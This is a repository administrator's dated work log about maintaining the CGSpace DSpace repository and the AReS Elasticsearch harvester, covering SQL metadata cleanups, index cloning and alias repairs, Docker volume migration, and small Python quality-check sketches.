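  • Going back to Ben’s REST API question above, the recursive approach would be roughly this (a sketch; the community UUID is a placeholder and the paging uses the limit and offset parameters):
  • +
+
# List the collection UUIDs in the ILRI community (placeholder UUID), then
+# page through each collection's items 100 at a time
+curl -s 'https://cgspace.cgiar.org/rest/communities/COMMUNITY-UUID/collections' | jq -r '.[].uuid' > /tmp/ilri-collections.txt
+while read -r uuid; do
+    offset=0
+    while true; do
+        items=$(curl -s "https://cgspace.cgiar.org/rest/collections/${uuid}/items?limit=100&offset=${offset}")
+        [ "$(echo "$items" | jq length)" -eq 0 ] && break
+        echo "$items" | jq -r '.[].handle'
+        offset=$((offset + 100))
+    done
+done < /tmp/ilri-collections.txt
+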

2021-02-22

+
    +
  • Start looking at splitting the series name and number in dcterms.isPartOf now that we have migrated to CG Core v2 +
      +
    • The numbers will go to cg.number
    • +
    • I notice there are about 100 series without a number, but they still have a semicolon, for example Esporo 72;
    • +
    • I think I will replace those like this:
    • +
    +
  • +
+
localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
+UPDATE 104
+
    +
  • As for splitting the other values, I think I can export the dspace_object_id and text_value and then upload it as a CSV rather than writing a Python script to create the new metadata values
  • +
+

2021-02-22

+
    +
  • Check the results of the AReS harvesting from last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 101380,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • Set the current items index to read only and make a backup:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
+
    +
  • Delete the current items index and clone the temp one to it:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+
    +
  • Then delete the temp and backup:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+{"acknowledged":true}%
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-22'
+

2021-02-23

+
    +
  • CodeObia sent a pull request for clickable countries on AReS +
      +
    • I deployed it and it seems to work, so I asked Abenet and Peter to test it so we can get feedback
    • +
    +
  • +
  • Remove semicolons from series names without numbers:
  • +
+
dspace=# BEGIN;
+dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
+UPDATE 104
+dspace=# COMMIT;
+
    +
  • Set all text_lang values on CGSpace to en_US to make the series replacements easier (this didn’t work, read below):
  • +
+
dspace=# BEGIN;
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE text_lang !='en_US' AND dspace_object_id IN (SELECT uuid FROM item);
+UPDATE 911
+cgspace=# COMMIT;
+
    +
  • Then export all series with their IDs to CSV:
  • +
+
dspace=# \COPY (SELECT dspace_object_id, text_value as "dcterms.isPartOf[en_US]" FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
+
    +
  • In OpenRefine I trimmed and consolidated whitespace, then made some quick cleanups to normalize the fields based on a sanity check +
      +
    • For example many Spore items are like “Spore, Spore 23”
    • +
    • Also, “Agritrade, August 2002”
    • +
    +
  • +
  • Then I copied the column to a new one called cg.number[en_US] and split the values for each on the semicolon using value.split(';')[0] and value.split(';')[1]
  • +
  • I tried to upload some of the series data to DSpace Test but I’m having an issue where some fields change that shouldn’t +
      +
    • It seems not all fields get updated when I set the text_lang globally, but if I updated it manually like this it works:
    • +
    +
  • +
+
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_value_id=5355845;
+UPDATE 1
+
    +
  • This also seems to work, using the id for just that one item:
  • +
+
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id='9840d19b-a6ae-4352-a087-6d74d2629322';
+UPDATE 37
+
    +
  • This seems to work better for some reason:
  • +
+
dspacetest=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
+UPDATE 18659
+
    +
  • I split the CSV file in batches of 5,000 using xsv, then imported them one by one in CGSpace:
  • +
+
$ dspace metadata-import -f /tmp/0.csv
+
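    +
  • For reference, the splitting itself is a one-liner with xsv, which names the chunks by their starting record number (which is where /tmp/0.csv comes from); file names here are illustrative:
  • +
+
$ xsv split -s 5000 /tmp /tmp/2021-02-23-series-cleaned.csv
+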
    +
  • It took FOREVER to import each file… like several hours each. MY GOD DSpace 6 is slow.
  • +
  • Help Dominique Perera debug some issues with the WordPress DSpace importer plugin from Macaroni Bros +
      +
    • She is not seeing the community list for CGSpace, and I see weird requests like this in the logs:
    • +
    +
  • +
+
104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] "GET /rest/communities?limit=1000 HTTP/1.1" 200 188779 "https://cgspace.cgiar.org/rest/communities?limit=1000" "RTB website BOT"
+104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] "GET /rest/communities//communities HTTP/1.1" 404 714 "https://cgspace.cgiar.org/rest/communities//communities" "RTB website BOT"
+
    +
  • The first request is OK, but the second one is malformed for sure
  • +
+

2021-02-24

+
    +
  • Export a list of journals for Peter to look through:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.journal", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
+COPY 3345
+
    +
  • Start a fresh harvesting on AReS because Udana mapped some items today and wants to include them in his report:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+
    +
  • Also, I want to include the new series name/number cleanups so it’s not a total waste of time
  • +
+

2021-02-25

+
    +
  • Hmm the AReS harvest last night seems to have finished successfully, but the number of items is less than I was expecting:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 99546,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • The current items index has 101380 items… I wonder what happened +
      +
    • I started a new indexing
    • +
    +
  • +
+

2021-02-26

+
    +
  • Last night’s indexing was more successful, there are now 101479 items in the index
  • +
  • Yesterday Yousef sent a pull request for the next/previous buttons on OpenRXV +
      +
    • I tested it this morning and it seems to be working
    • +
    +
  • +
+

2021-02-28

+
    +
  • Abenet asked me to import seventy-three records for CRP Forests, Trees and Agroforestry +
      +
    • I checked them briefly and found that there were thirty+ journal articles, and none of them had cg.journal, cg.volume, cg.issue, or dcterms.license so I spent a little time adding them
    • +
    • I used a GREL expression to extract the journal volume and issue from the citation into new columns:
    • +
    +
  • +
+
value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,"")
+value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1")
+
    +
  • This value.partition was new to me… and it took me a bit of time to figure out whether I needed to escape the parentheses in the issue number or not (no) and how to reference a capture group with value.replace
  • +
  • I tried to check the 1095 CIFOR records from last week for duplicates on DSpace Test, but the page says “Processing” and never loads +
      +
    • I don’t see any errors in the logs, but there are two jQuery errors in the browser console
    • +
    • I filed an issue with Atmire
    • +
    +
  • +
  • Upload twelve items to CGSpace for Peter
  • +
  • Niroshini from IWMI is still having issues adding WLE subjects to items during the metadata review step in the workflow
  • +
  • It seems the BatchEditConsumer log spam is gone since I applied Atmire’s patch
  • +
+
$ grep -c 'BatchEditConsumer should not have been given' dspace.log.2021-02-[12]*
+dspace.log.2021-02-10:5067
+dspace.log.2021-02-11:2647
+dspace.log.2021-02-12:4231
+dspace.log.2021-02-13:221
+dspace.log.2021-02-14:0
+dspace.log.2021-02-15:0
+dspace.log.2021-02-16:0
+dspace.log.2021-02-17:0
+dspace.log.2021-02-18:0
+dspace.log.2021-02-19:0
+dspace.log.2021-02-20:0
+dspace.log.2021-02-21:0
+dspace.log.2021-02-22:0
+dspace.log.2021-02-23:0
+dspace.log.2021-02-24:0
+dspace.log.2021-02-25:0
+dspace.log.2021-02-26:0
+dspace.log.2021-02-27:0
+dspace.log.2021-02-28:0
+

March, 2021

2021-03-01

+
    +
  • Discuss some OpenRXV issues with Abdullah from CodeObia +
      +
    • He’s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API
    • +
    • Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies
    • +
    +
  • +
+

2021-03-02

+ +

2021-03-03

+ +

2021-03-04

+
    +
  • Peter is having issues with the workflow since yesterday +
      +
    • I looked at the Munin stats and see a high number of database locks since yesterday
    • +
    +
  • +
+

PostgreSQL locks week +PostgreSQL connections week

+
    +
  • I looked at the number of connections in PostgreSQL and it’s definitely high again:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+1020
+
    +
  • I reported it to Atmire so they can take a look, on the same issue where we had been tracking this before
  • +
  • Abenet asked me to add a new ORCID for ILRI staff member Zoe Campbell
  • +
  • I added it to the controlled vocabulary and then tagged her existing items on CGSpace using my add-orcid-identifiers-csv.py script:
  • +
+
$ cat 2021-03-04-add-zoe-campbell-orcid.csv 
+dc.contributor.author,cg.creator.identifier
+"Campbell, Zoë","Zoe Campbell: 0000-0002-4759-9976"
+"Campbell, Zoe A.","Zoe Campbell: 0000-0002-4759-9976"
+$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • I still need to do cleanup on the journal articles metadata +
      +
    • Peter sent me some cleanups but I can’t use them in the search/replace format he gave
    • +
    • I think it’s better to export the metadata values with IDs and import cleaned up ones as CSV
    • +
    +
  • +
+
localhost/dspace63= > \COPY (SELECT dspace_object_id AS id, text_value as "cg.journal" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
+COPY 32087
+
    +
  • I used OpenRefine to remove all journal values that didn’t contain one of these characters: “;”, “(”, or “)” +
      +
    • Then I cloned the cg.journal field to cg.volume and cg.issue
    • +
    • I used some GREL expressions like these to extract the journal name, volume, and issue:
    • +
    +
  • +
+
value.partition(';')[0].trim() # to get journal names
+value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,"$1") # to get journal volumes
+value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1") # to get journal issues
+
    +
  • Then I uploaded the changes to CGSpace using dspace metadata-import
  • +
  • Margarita from CCAFS was asking about an error deleting some items that were showing up in Google and should have been private + +
  • +
  • Yesterday Abenet added me to a WLE collection approver/editer steps so we can try to figure out why Niroshini is having issues adding metadata to Udana’s submissions +
      +
    • I edited Udana’s submission to CGSpace: +
        +
      • corrected the title
      • +
      • added language English
      • +
      • changed the link to the external item page instead of PDF
      • +
      • added SDGs from the external item page
      • +
      • added AGROVOC subjects from the external item page
      • +
      • added pagination (extent)
      • +
      • changed the license to “other” because CC-BY-NC-ND is not printed anywhere in the PDF or external item page
      • +
      +
    • +
    +
  • +
+

2021-03-05

+
    +
  • I migrated the Docker bind mount for the AReS Elasticsearch container to a Docker volume:
  • +
+
$ docker-compose -f docker/docker-compose.yml down
+$ docker volume create docker_esData_7
+$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
+$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
+$ docker rm es_dummy
+# edit docker/docker-compose.yml to switch from bind mount to volume
+$ docker-compose -f docker/docker-compose.yml up -d
+
    +
  • The trick is that when you create a volume like “myvolume” from a docker-compose.yml file, Docker will create it with the name “docker_myvolume” +
      +
    • If you create it manually on the command line with docker volume create myvolume then the name is literally “myvolume”
    • +
    +
  • +
  • I still need to make the changes to git master and add these notes to the pull request so Moayad and others can benefit
  • +
  • Delete the openrxv-items-temp index to test a fresh harvesting:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+

2021-03-05

+
    +
  • Check the results of the AReS harvesting from last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 101761,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • Set the current items index to read only and make a backup:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
+
    +
  • Delete the current items index and clone the temp one to it:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+
    +
  • Then delete the temp and backup:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+{"acknowledged":true}%
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-05'
+
+

2021-03-07

+
    +
  • I realized there is something wrong with the Elasticsearch indexes on AReS +
      +
    • On a new test environment I see openrxv-items is correctly an alias of openrxv-items-final:
    • +
    +
  • +
+
$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
+...
+    "openrxv-items-final": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+
    +
  • But on AReS production openrxv-items has somehow become a concrete index:
  • +
+
$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
+...
+    "openrxv-items": {
+        "aliases": {}
+    },
+    "openrxv-items-final": {
+        "aliases": {}
+    },
+    "openrxv-items-temp": {
+        "aliases": {}
+    },
+
    +
  • I fixed the issue on production by cloning the openrxv-items index to openrxv-items-final, deleting openrxv-items, and then re-creating it as an alias:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
+$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+
    +
  • Delete backups and remove read-only mode on openrxv-items:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-07'
+$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
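    +
  • To confirm that the alias is back in place (just a quick verification):
  • +
+
$ curl -s 'http://localhost:9200/_alias/openrxv-items' | python -m json.tool
+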
+
    +
  • Linode sent alerts about the CPU usage on CGSpace yesterday and the day before +
      +
    • Looking in the logs I see a few IPs making heavy usage on the REST API and XMLUI:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '0[56]/Mar/2021' | goaccess --log-format=COMBINED -
+
    +
  • I see the usual IPs for CCAFS and ILRI importer bots, but also 143.233.242.132 which appears to be for GARDIAN:
  • +
+
# zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c Delphi
+6237
+# zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c -v Delphi
+6418
+
    +
  • They seem to make requests twice, once with the Delphi user agent that we know and already mark as a bot, and once with a “normal” user agent +
      +
    • Looking in Solr I see they have been using this IP for awhile, as they have 100,000 hits going back into 2020
    • +
    • I will add this IP to the list of bots in nginx and purge it from Solr with my check-spider-ip-hits.sh script
    • +
    +
  • +
  • I made a few changes to OpenRXV: + +
  • +
+

2021-03-08

+
    +
  • I approved the WLE item that I edited last week, and all the metadata is there: https://hdl.handle.net/10568/111810 +
      +
    • So I’m not sure what Niroshini’s issue with metadata is…
    • +
    +
  • +
  • Peter sent a message yesterday saying that his item finally got committed +
      +
    • I looked at the Munin graphs and there was a MASSIVE spike in database activity two days ago, and now database locks are back down to normal levels (from 1000+):
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+13
+
    +
  • On 2021-03-03 the PostgreSQL transactions started rising:
  • +
+

PostgreSQL query length week

+
    +
  • After that the connections and locks started going up, peaking on 2021-03-06:
  • +
+

PostgreSQL locks week +PostgreSQL connections week

+
    +
  • I sent another message to Atmire to ask if they have time to look into this
  • +
  • CIFOR is pressuring me to upload the batch items from last week +
      +
    • Vika sent me a final file with some duplicates that Peter identified removed
    • +
    • I extracted and re-applied my basic corrections from last week in OpenRefine, then ran the items through csv-metadata-quality checker and uploaded them to CGSpace
    • +
    • In total there are 1,088 items
    • +
    +
  • +
  • Udana from IWMI emailed to ask about CGSpace thumbnails
  • +
  • Udana from IWMI emailed to ask about an item uploaded recently that does not appear in AReS +
      +
    • The item was added to the archive on 2021-03-05 and I last harvested on 2021-03-06, so it should have been picked up; this might be another case of items missing from the harvest
    • +
    +
  • +
  • Abenet got a quote from Atmire to buy 125 credits for 3750€
  • +
  • Maria at Bioversity sent some feedback about duplicate items on AReS
  • +
  • I’m wondering if the issue of the openrxv-items-final index not getting cleared after a successful harvest (which results in having 200,000, then 300,000, etc items) has to do with the alias issue I fixed yesterday +
      +
    • I will start a fresh harvest on AReS now to check, but first back up the current index just in case:
    • +
    +
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
+# start harvesting on AReS
+
    +
  • As I saw on my local test instance, even when you cancel a harvesting, it replaces the openrxv-items-final index with whatever is in openrxv-items-temp automatically, so I assume it will do the same now
  • +
+

2021-03-09

+
    +
  • The harvesting on AReS finished last night and everything worked as expected, with no manual intervention +
      +
    • This means that the issue we were facing for a few months was due to the openrxv-items index being deleted and re-created as a standalone index instead of an alias of openrxv-items-final
    • +
    +
  • +
  • Talk to Moayad about OpenRXV development +
      +
    • We realized that the missing/duplicate items issue is probably due to the long harvesting time on the REST API: in the time between starting the harvest on page 0 and finishing it on page 900 (in the CGSpace example), some items will have been added to the repository, which causes the pages to shift
    • +
    • I proposed a solution in the GitHub issue: after harvesting, we consult the site’s XML sitemap to see if we missed any items, and then harvest those individually (see the sketch at the end of this day’s notes)
    • +
    +
  • +
  • Peter sent me a list of 356 DOIs from Altmetric that don’t have our Handles, so we need to Tweet them +
      +
    • I used my doi-to-handle.py script to generate a list of handles and titles for him:
    • +
    +
  • +
+
$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p 'fuuu'
+
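  • Returning to the sitemap idea above: a minimal sketch of what that check could look like (an assumption-laden sketch, not OpenRXV's actual implementation; it assumes the DSpace sitemap index lives at https://cgspace.cgiar.org/sitemap and that we saved the harvested handles to a file):

import xml.etree.ElementTree as ET

import requests

# Assumption: the sitemap index is at /sitemap and links to sitemap0, sitemap1, etc.
NS = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}

def sitemap_handles(base="https://cgspace.cgiar.org"):
    handles = set()
    index = ET.fromstring(requests.get(f"{base}/sitemap").content)
    for sitemap in index.findall(".//sm:loc", NS):
        urlset = ET.fromstring(requests.get(sitemap.text).content)
        for url in urlset.findall(".//sm:loc", NS):
            # item URLs look like https://cgspace.cgiar.org/handle/10568/12345
            if "/handle/" in url.text:
                handles.add(url.text.split("/handle/")[1])
    return handles

# /tmp/harvested-handles.txt is a hypothetical dump of the handles we harvested
harvested = {line.strip() for line in open("/tmp/harvested-handles.txt")}
missed = sitemap_handles() - harvested
print(f"{len(missed)} items are in the sitemap but missing from the harvest")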

2021-03-10

+
    +
  • Colleagues from ICARDA asked about how we should handle ISI journals in CG Core, as CGSpace uses cg.isijournal and MELSpace uses mel.impact-factor +
      +
    • I filed an issue on the cg-core project to ask colleagues for ideas
    • +
    +
  • +
  • Peter said he doesn’t see “Source Code” or “Software” in the output type facet on the ILRI community, but I see it on the home page, so I will try to do a full Discovery re-index:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    318m20.485s
+user    215m15.196s
+sys     2m51.529s
+
    +
  • Now I see ten items for “Source Code” in the facets…
  • +
  • Add GPL and MIT licenses to the list of licenses on CGSpace input form since we will start capturing more software and source code
  • +
  • Added the ability to check dcterms.license values against the SPDX licenses in the csv-metadata-quality tool (a sketch of this kind of check is at the end of this day’s notes) +
      +
    • Also, I made some other minor fixes and released version 0.4.6 on GitHub
    • +
    +
  • +
  • Proof and upload twenty-seven items to CGSpace for Peter Ballantyne +
      +
    • Mostly Ugandan outputs for CRP Livestock and Livestock and Fish
    • +
    +
  • +
+
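  • A rough sketch of the kind of SPDX check mentioned above (not necessarily how csv-metadata-quality implements it; it reads the official SPDX license list JSON, and the CSV path and column name are just examples):

import csv

import requests

# The official SPDX license list (licenseId values like "CC-BY-4.0", "MIT", etc)
SPDX_JSON = "https://spdx.org/licenses/licenses.json"
licenses = {lic["licenseId"] for lic in requests.get(SPDX_JSON).json()["licenses"]}

# /tmp/items.csv and the column name are examples, not the tool's actual interface
with open("/tmp/items.csv", newline="") as f:
    for row in csv.DictReader(f):
        value = row.get("dcterms.license", "")
        if value and value not in licenses:
            print(f"Invalid SPDX license identifier: {value}")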

2021-03-14

+
    +
  • Switch to linux-kvm kernel on linode20 and linode18:
  • +
+
# apt update && apt full-upgrade
+# apt install linux-kvm
+# apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
+# apt autoremove && apt autoclean
+# reboot
+
    +
  • Deploy latest changes from 6_x-prod branch on CGSpace
  • +
  • Deploy latest changes from OpenRXV master branch on AReS
  • +
  • Last week Peter added OpenRXV to CGSpace: https://hdl.handle.net/10568/112982
  • +
  • Back up the current openrxv-items-final index on AReS to start a new harvest:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
+$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+
    +
  • After the harvesting finished it seems the indexes got messed up again, as openrxv-items is an alias of openrxv-items-temp instead of openrxv-items-final:
  • +
+
$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
+...
+    "openrxv-items-final": {
+        "aliases": {}
+    },
+    "openrxv-items-temp": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+
    +
  • Anyways, the number of items in openrxv-items seems OK and the AReS Explorer UI is working fine +
      +
    • I will have to manually fix the indexes before the next harvesting
    • +
    +
  • +
  • Publish the web version of the DSpace CSV Metadata Quality checker tool that I wrote this weekend on GitHub: https://github.com/ilri/csv-metadata-quality-web + +
  • +
+

2021-03-16

+
    +
  • Review ten items for Livestock and Fish and Dryland Systems from Peter +
      +
    • I told him to try the new web-based CSV Metadata Quality checker and he thought it was cool
    • +
    • I found one exact duplicate item and it gave me an idea to try to detect this in the tool
    • +
    +
  • +
+
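  • The duplicate detection idea could look something like this (only a sketch; it assumes we call rows duplicates when title, type, and issue date all match, and the column names are examples):

import pandas as pd

# Example column names from a DSpace metadata export; adjust to the real CSV
key = ["dc.title[en_US]", "dcterms.type[en_US]", "dcterms.issued[en_US]"]

df = pd.read_csv("/tmp/items.csv", dtype=str)
# keep=False marks every row in a duplicated group, not just the later ones
dupes = df[df.duplicated(subset=key, keep=False)].sort_values(by=key)

for _, row in dupes.iterrows():
    print(f"Possible duplicate: {row[key[0]]} (id: {row['id']})")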

2021-03-17

+ +

2021-03-18

+
    +
  • I added the ability to check for, and fix, “mojibake” characters in csv-metadata-quality
  • +
+
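  • For reference, a minimal sketch of that kind of mojibake check using the ftfy library (the actual csv-metadata-quality code may differ):

from ftfy import fix_text

# If ftfy's "fixed" version differs from the original then the value probably
# contains mojibake (or other weirdness), for example "PublicaÃ§ao" -> "Publicaçao"
def check_mojibake(value: str, fix: bool = False) -> str:
    fixed = fix_text(value)
    if fixed != value:
        print(f"Possible mojibake: {value!r} -> {fixed!r}")
        return fixed if fix else value
    return value

check_mojibake("CIAT PublicaÃ§ao")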

2021-03-21

+
    +
  • Last week Atmire asked me which browser I was using to test the duplicate checker, which I had reported as not loading +
      +
    • I tried to load it in Chrome and it works… hmmm
    • +
    +
  • +
  • Back up the current openrxv-items-final index to start a fresh AReS Harvest:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
+$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+
    +
  • Then start harvesting in the AReS Explorer admin UI
  • +
+

2021-03-22

+
    +
  • The harvesting on AReS yesterday completed, but somehow I have twice the number of items:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
+{
+  "count" : 206204,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • Hmmm and even my backup index has a strange number of items:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&pretty'
+{
+  "count" : 844,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • I deleted all indexes and re-created the openrxv-items alias:
  • +
+
$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
+...
+    "openrxv-items-temp": {
+        "aliases": {}
+    },
+    "openrxv-items-final": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    }
+
    +
  • Then I started a new harvesting
  • +
  • I switched the Node.js in the Ansible infrastructure scripts to v12 since v10 will cease to be supported soon +
      +
    • I re-deployed DSpace Test (linode26) with Node.js 12 and restarted the server
    • +
    +
  • +
  • The AReS harvest finally finished, with 1047 pages of items, but the openrxv-items-final index is empty and the openrxv-items-temp index has 103,000 items:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 103162,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • I tried to clone the temp index to the final, but got an error:
  • +
+
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
+{"error":{"root_cause":[{"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"}],"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"},"status":400}% 
+
    +
  • I looked in the Docker logs for Elasticsearch and saw a few memory errors:
  • +
+
java.lang.OutOfMemoryError: Java heap space
+
    +
  • According to /usr/share/elasticsearch/config/jvm.options in the Elasticsearch container the default JVM heap is 1g +
      +
    • I see the running Java process has -Xms1g -Xmx1g in its invocation, so I guess it must indeed be using 1g
    • +
    • We can change the heap size with the ES_JAVA_OPTS environment variable
    • +
    • Or perhaps better, we should use a jvm.options.d file because if you use the environment variable it overrides all other JVM options from the default jvm.options
    • +
    • I tried to set memory to 1536m by binding an options file and restarting the container, but it didn’t seem to work
    • +
    • Nevertheless, after restarting I see 103,000 items in the Explorer…
    • +
    • But the indexes are still kinda messed up… the openrxv-items index is an alias of the wrong index!
    • +
    +
  • +
+
    "openrxv-items-final": {
+        "aliases": {}
+    },
+    "openrxv-items-temp": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+

2021-03-23

+
    +
  • For reference you can also get the Elasticsearch JVM stats from the API:
  • +
+
$ curl -s 'http://localhost:9200/_nodes/jvm?human' | python -m json.tool
+
    +
  • I re-deployed AReS with 1.5GB of heap using the ES_JAVA_OPTS environment variable + +
  • +
  • Then I fixed the aliases to make sure openrxv-items was an alias of openrxv-items-final, similar to how I did a few weeks ago
  • +
  • I re-created the temp index:
  • +
+
$ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
+

2021-03-24

+
    +
  • Atmire responded to the ticket about the Duplicate Checker +
      +
